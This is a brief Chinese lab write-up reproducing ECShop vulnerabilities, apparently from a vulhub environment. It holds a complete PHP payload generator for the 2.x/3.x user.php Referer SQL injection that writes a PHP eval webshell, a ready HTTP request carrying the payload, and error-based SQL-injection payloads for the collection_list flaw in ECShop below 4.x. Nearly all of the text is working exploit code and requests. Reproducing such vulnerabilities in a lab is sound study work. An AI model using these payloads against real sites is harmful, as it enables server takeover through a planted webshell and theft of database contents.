ECShop
1.漏洞复现
xianzhi-2017-02-82239600(vulhub)
访问 http://IP:8080 和 http://IP:8081 对 2.x 和 3.x 版本进行安装
数据库主机填mysql,密码填root
使用PHP脚本生成Payload
<?php $shellname = 'shell.php'; $shellcode = '<?php @eval($_POST[1]);?>'; $hash2 = '554fcae493e564ee0dc75bdf2ebf94ca'; //固定 $hash3 = '45ea207d7a2b68c49582d2d22adf953a'; $webshell = base64_encode("file_put_contents('$shellname','$shellcode')"); $shell = bin2hex('{$asd\'];assert(base64_decode(\''.$webshell.'\'));//}xxx'); $id = "-1' UNION/*"; $arr = [ 'num' => sprintf('*/SELECT 1,0x%s,2,4,5,6,7,8,0x%s,10-- -', bin2hex($id), $shell), 'id' => $id ]; $s = serialize($arr); echo 'Payload for 2.x:<br>'; echo "{$hash2}ads|{$s}{$hash2}"; echo '<br><br>Payload for 3.x:<br>'; echo "{$hash3}ads|{$s}{$hash3}";
用户登录页面抓包根据版本添加Referer为Payload写入PHP一句话木马
GET /user.php HTTP/1.1 Host: 192.168.135.131:8080 Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:161:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f64652827634768776157356d627967702729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca Upgrade-Insecure-Requests: 1 Connection: close
一句话木马路径:/shell.php
collection_list-sqli
影响范围:ECShop < 4.x
同样安装,/user.php注册用户hacker
用户中心->我的收藏抓包添加X-Forwarded-Host为Payload
两种Payload:
45ea207d7a2b68c49582d2d22adf953auser_account|a:2:{s:7:"user_id";s:38:"0'-(updatexml(1,repeat(user(),2),1))-'";s:7:"payment";s:1:"4";}|45ea207d7a2b68c49582d2d22adf953a
45ea207d7a2b68c49582d2d22adf953apay_log|s:44:"1' and updatexml(1,repeat(user(),2),1) and '";|